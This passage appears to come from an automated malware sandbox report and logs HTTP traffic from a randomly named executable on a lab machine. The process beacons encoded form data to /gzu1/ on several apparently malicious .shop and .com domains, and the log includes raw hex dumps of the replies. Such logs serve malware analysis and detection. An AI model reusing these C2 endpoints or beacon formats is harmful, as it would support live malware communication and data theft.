6c 6e 68 4b 73 35 46 57 6b 36 48 51 47 67 75 39 34 37 71 2f 4c 50 51 68 62 65 65 39 58 69 67 70 41 59 36 6a 42 4a 55 6d 75 4f 4f 74 62 62 72 50 4e 66 4c 56 42 52 38 30 43 71 79 34 7a 39 4d 46 53 4a 35 6d 48 75 66 74 32 66 4f 32 72 48 44 4c 4c 50 78 65 37 64 42 7a 52 6c 4a 38 38 4d 46 47 6e 78 6f 54 6c 76 33 73 43 44 6a 76 58 45 50 72 6b 73 7a 70 6c 50 70 6f 53 38 79 71 4b 70 33 6b 43 4d 6c 51 3d Data Ascii: 7Br4wVx=YRUq3YSkPaCDfkW9pt1vW+aQPGTGXNcSsuKpJPDdi5c/na7JA3C/d1qnELJ24yYVG7dVxh5tdHvGmmf5m+ulnhKs5FWk6HQGgu947q/LPQhbee9XigpAY6jBJUmuOOtbbrPNfLVBR80Cqy4z9MFSJ5mHuft2fO2rHDLLPxe7dBzRlJ88MFGnxoTlv3sCDjvXEPrkszplPpoS8yqKp3kCMlQ=
May 2, 2024 15:08:38.177081108 CEST	309	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Thu, 02 May 2024 13:08:38 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49761	213.171.195.105	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:41.135170937 CEST	390	OUT	GET /gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP HTTP/1.1 Host: www.holein1sa.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:08:41.297219992 CEST	234	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 02 May 2024 13:08:41 GMT Content-Type: text/html Content-Length: 2873 Last-Modified: Mon, 31 Jul 2023 14:17:57 GMT Connection: close ETag: "64c7c295-b39" Accept-Ranges: bytes
May 2, 2024 15:08:41.297441959 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel=
May 2, 2024 15:08:41.297517061 CEST	1289	IN	Data Raw: 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 72 6f 6e 67 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3f 3c 2f 73 74 Data Ascii: a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSearchCta">Start search</a> </div> <div class="card card--i
May 2, 2024 15:08:41.297563076 CEST	295	IN	Data Raw: 22 29 2e 66 6f 72 45 61 63 68 28 70 6c 61 63 65 68 6f 6c 64 65 72 20 3d 3e 20 70 6c 61 63 65 68 6f 6c 64 65 72 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 29 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 Data Ascii: ").forEach(placeholder => placeholder.innerText = cleanHostname) document.getElementById("domainSearchCta").href = `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49762	91.195.240.19	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:46.656414986 CEST	676	OUT	POST /gzu1/ HTTP/1.1 Host: www.luckydomainz.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.luckydomainz.shop Referer: http://www.luckydomainz.shop/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 48 4b 6c 48 66 50 67 79 72 4a 66 31 31 2b 4b 78 2f 69 78 47 4c 6f 5a 4f 62 54 35 38 59 46 33 39 67 33 6b 58 30 44 41 43 6f 78 33 75 75 65 71 6a 79 54 63 56 74 64 44 32 33 55 59 41 43 6e 37 5a 49 46 65 30 41 59 73 74 47 62 38 30 53 71 6c 76 36 4e 34 38 49 64 65 7a 44 4a 54 46 68 59 70 31 39 77 49 78 67 53 79 67 78 74 6a 33 6a 54 30 77 42 4d 51 6c 79 2b 78 67 43 5a 69 41 4d 2f 48 65 69 31 66 72 38 74 41 51 6f 51 2f 56 62 76 54 6a 58 69 45 56 59 34 2b 6e 44 45 56 30 68 70 34 7a 51 72 31 46 45 53 55 35 4b 52 2b 50 46 77 51 5a 30 71 77 6f 61 65 65 2f 6f 4a 49 63 4f 79 6d 59 37 51 3d 3d Data Ascii: 7Br4wVx=HKlHfPgyrJf11+Kx/ixGLoZObT58YF39g3kX0DACox3uueqjyTcVtdD23UYACn7ZIFe0AYstGb80Sqlv6N48IdezDJTFhYp19wIxgSygxtj3jT0wBMQly+xgCZiAM/Hei1fr8tAQoQ/VbvTjXiEVY4+nDEV0hp4zQr1FESU5KR+PFwQZ0qwoaee/oJIcOymY7Q==
May 2, 2024 15:08:46.837913036 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Thu, 02 May 2024 13:08:46 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49763	91.195.240.19	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:49.372937918 CEST	696	OUT	POST /gzu1/ HTTP/1.1 Host: www.luckydomainz.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.luckydomainz.shop Referer: http://www.luckydomainz.shop/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 48 4b 6c 48 66 50 67 79 72 4a 66 31 30 61 4f 78 2b 46 46 47 4e 49 5a 50 56 7a 35 38 53 6c 33 35 67 33 6f 58 30 43 45 53 6f 48 76 75 75 2f 32 6a 78 53 63 56 73 64 44 32 38 30 59 46 4d 48 37 57 49 43 57 38 41 64 55 74 47 59 41 30 53 72 35 76 36 2b 67 2f 4a 4e 65 39 61 5a 54 44 73 34 70 31 39 77 49 78 67 53 58 6f 78 70 50 33 6a 44 45 77 43 6f 45 6b 37 65 78 2f 49 35 69 41 47 76 48 53 69 31 65 4f 38 73 64 37 6f 53 48 56 62 72 62 6a 58 58 6b 57 52 34 2f 73 63 30 55 45 6c 62 5a 35 66 4a 67 78 4b 43 30 62 56 7a 69 34 45 32 42 44 6c 62 52 2f 49 65 36 4d 31 4f 42 6f 44 78 62 52 67 65 49 47 61 58 67 55 78 35 31 48 56 71 4c 6a 6c 61 72 33 50 6e 51 3d Data Ascii: 7Br4wVx=HKlHfPgyrJf10aOx+FFGNIZPVz58Sl35g3oX0CESoHvuu/2jxScVsdD280YFMH7WICW8AdUtGYA0Sr5v6+g/JNe9aZTDs4p19wIxgSXoxpP3jDEwCoEk7ex/I5iAGvHSi1eO8sd7oSHVbrbjXXkWR4/sc0UElbZ5fJgxKC0bVzi4E2BDlbR/Ie6M1OBoDxbRgeIGaXgUx51HVqLjlar3PnQ=
May 2, 2024 15:08:49.549385071 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Thu, 02 May 2024 13:08:49 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49764	91.195.240.19	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:52.075913906 CEST	394	OUT	GET /gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP HTTP/1.1 Host: www.luckydomainz.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:08:52.546307087 CEST	1289	IN	HTTP/1.1 200 OK date: Thu, 02 May 2024 13:08:52 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fa9vJgxwRzfdfEEz0BQMdgxFYsuQ4Y0LG2lu4uS+sBG2xfR2DKVn626Wo3S1MfbJr5DXYBVQtvnjp1LtZEU97Q== last-modified: Thu, 02 May 2024 13:08:52 GMT x-cache-miss-from: parking-7cbf88ff6b-tlz7g server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 66 61 39 76 4a 67 78 77 52 7a 66 64 66 45 45 7a 30 42 51 4d 64 67 78 46 59 73 75 51 34 59 30 4c 47 32 6c 75 34 75 53 2b 73 42 47 32 78 66 52 32 44 4b 56 6e 36 32 36 57 6f 33 53 31 4d 66 62 4a 72 35 44 58 59 42 56 51 74 76 6e 6a 70 31 4c 74 5a 45 55 39 37 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 [TRUNCATED] Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fa9vJgxwRzfdfEEz0BQMdgxFYsuQ4Y0LG2lu4uS+sBG2xfR2DKVn626Wo3S1MfbJr5DXYBVQtvnjp1LtZEU97Q==><head><meta charset="utf-8"><title>luckydomainz.shop - luckydomainz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luckydomainz.shop is your first and best source for all of the information youre looking for. Fro
May 2, 2024 15:08:52.546358109 CEST	1289	IN	Data Raw: 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20 Data Ascii: m general topics to more of what you would expect to find here, luckydomainz.shop has it all. We hope yAECou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
May 2, 2024 15:08:52.546432018 CEST	1289	IN	Data Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance
May 2, 2024 15:08:52.546516895 CEST	1289	IN	Data Raw: 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f Data Ascii: ground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.c
May 2, 2024 15:08:52.546530008 CEST	446	IN	Data Raw: 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 Data Ascii: ntent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-s
May 2, 2024 15:08:52.546590090 CEST	1289	IN	Data Raw: 31 30 36 32 0d 0a 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a Data Ascii: 1062ookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-rig
May 2, 2024 15:08:52.546606064 CEST	1289	IN	Data Raw: 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 Data Ascii: indow__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;te
May 2, 2024 15:08:52.546657085 CEST	1289	IN	Data Raw: 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f Data Ascii: ;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch
May 2, 2024 15:08:52.546740055 CEST	1289	IN	Data Raw: 65 72 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 Data Ascii: er{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.
May 2, 2024 15:08:52.546946049 CEST	1289	IN	Data Raw: 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 7b 64 69 Data Ascii: tads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-
May 2, 2024 15:08:52.722687960 CEST	1289	IN	Data Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 64 6f 6d 61 69 6e 7b 64 69 73 70 6c 61 79 Data Ascii: t-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{width:100%;height:auto;max-width:1440px;cursor:point

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49765	47.76.136.160	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:08:59.221474886 CEST	661	OUT	POST /gzu1/ HTTP/1.1 Host: www.qdzdvrk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.qdzdvrk.shop Referer: http://www.qdzdvrk.shop/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 41 65 63 65 32 63 33 65 42 75 74 66 41 72 76 78 63 64 39 4b 70 4e 75 51 47 37 4b 4f 48 46 73 30 6c 2f 37 4b 79 75 68 54 71 50 2b 36 4c 46 68 30 68 43 37 37 6c 42 4e 6b 43 52 61 6b 62 4b 54 71 77 67 45 47 53 50 37 62 49 72 4a 37 4d 45 64 69 58 50 45 72 55 44 7a 57 70 41 30 56 31 79 38 59 30 43 68 4d 4b 54 75 7a 33 43 46 56 68 56 46 6b 32 37 58 30 53 56 54 75 70 49 4b 4d 47 57 5a 48 5a 2f 53 53 62 58 45 73 58 67 76 67 6e 55 65 46 54 43 30 66 46 49 43 56 47 61 76 4d 4c 31 32 7a 4b 48 4d 6e 52 54 4d 63 30 72 76 73 47 45 42 64 36 69 32 48 56 55 74 54 62 52 72 64 74 54 65 49 4d 51 3d 3d Data Ascii: 7Br4wVx=Aece2c3eButfArvxcd9KpNuQG7KOHFs0l/7KyuhTqP+6LFh0hC77lBNkCRakbKTqwgEGSP7bIrJ7MEdiXPErUDzWpA0V1y8Y0ChMKTuz3CFVhVFk27X0SVTupIKMGWZHZ/SSbXEsXgvgnUeFTC0fFICVGavML12zKHMnRTMc0rvsGEBd6i2HVUtTbRrdtTeIMQ==
May 2, 2024 15:08:59.536159039 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 May 2024 13:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 3d 8f d3 40 10 ed f3 2b 06 a7 81 c2 f1 07 89 94 33 be 34 7c 94 70 45 c4 89 72 ec 1d c7 ab b3 bd 66 77 9d 23 20 24 44 75 fc 07 28 8e 92 8a 86 96 3f 83 38 e9 fe 05 bb b1 8f c4 91 75 27 9d 0b 7f bc 79 3b 6f 77 de 8c e3 07 cf 5e 3d 5d be 39 79 0e b9 2e 8b c5 28 be 79 10 b2 c5 08 cc 15 97 a4 11 d2 1c a5 22 7d ec 34 3a 73 e7 0e 78 5d 50 73 5d d0 e2 a5 d0 f0 42 34 15 83 87 e3 a9 3f 7d 14 7b 2d 3e 6a 33 28 bd 31 a4 ed bb bd 12 c1 36 f0 e1 ff a7 85 32 51 e9 08 2a 21 4b 2c e0 a8 d6 e0 bc 26 c9 b0 42 e7 49 8f 97 8a 42 c8 08 c6 be ef f7 03 09 a6 67 2b 69 b7 60 a2 59 96 ed a2 1f db 4d 58 95 3c b8 4d 36 98 df ad 9b 1d ea 96 28 57 bc 72 13 a1 b5 28 23 98 cc a8 1c 96 0e 6f 95 9e de 2d 3d 37 67 be b7 fa e3 41 f5 44 14 0c 82 60 58 7b af 6e f5 e0 ea 7b ba b5 97 77 b2 26 a9 b8 a8 0e d2 77 26 af 24 6e fa 26 db 2e 71 15 7f 4f 11 18 af 0e 1a 40 48 46 d2 d5 a2 8e 20 a8 df 81 12 05 67 30 46 c4 3e af 46 c6 78 b5 ea 88 fb 6e d9 0e 39 b0 33 e8 bb 69 19 b1 d7 75 73 ec e5 db 19 [TRUNCATED] Data Ascii: 208T=@+34\|pErfw# $Du(?8u'y;ow^=]9y.(y"}4:sx]Ps]B4?}{->j3(162Q*!K,&BIBg+i`YMX<M6(Wr(#o-=7gAD`X{n{w&w&$n&.qO@HF g0F>Fxn93iusqY0`;yuW_~g'nF9&bM@R"M)ym"ij"%`#6IARSUL54xf:w(N&D05kHTuvp3!"rU;Z-)d50

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49766	47.76.136.160	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:02.064500093 CEST	681	OUT	POST /gzu1/ HTTP/1.1 Host: www.qdzdvrk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.qdzdvrk.shop Referer: http://www.qdzdvrk.shop/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 41 65 63 65 32 63 33 65 42 75 74 66 42 4c 7a 78 64 36 4a 4b 76 74 75 54 44 37 4b 4f 4a 6c 73 77 6c 2f 33 4b 79 76 6b 59 72 36 6d 36 49 6b 52 30 7a 32 76 37 72 68 4e 6b 4a 78 61 6c 66 4b 54 6a 77 67 49 34 53 50 48 62 49 72 4e 37 4d 42 68 69 58 38 73 73 56 54 7a 55 78 77 30 62 6f 69 38 59 30 43 68 4d 4b 51 54 75 33 43 64 56 68 6c 56 6b 35 36 58 37 52 56 54 74 6a 6f 4b 4d 52 47 5a 62 5a 2f 54 48 62 54 4d 4b 58 6c 72 67 6e 55 75 46 54 7a 30 63 50 49 44 51 43 61 76 63 43 68 76 70 4e 79 73 6f 51 68 68 6e 36 70 44 64 44 43 51 48 72 54 58 51 48 55 4a 67 47 57 69 70 67 51 6a 42 58 65 5a 63 37 7a 63 6d 44 78 36 68 50 6b 2b 6d 77 68 2b 54 44 50 55 3d Data Ascii: 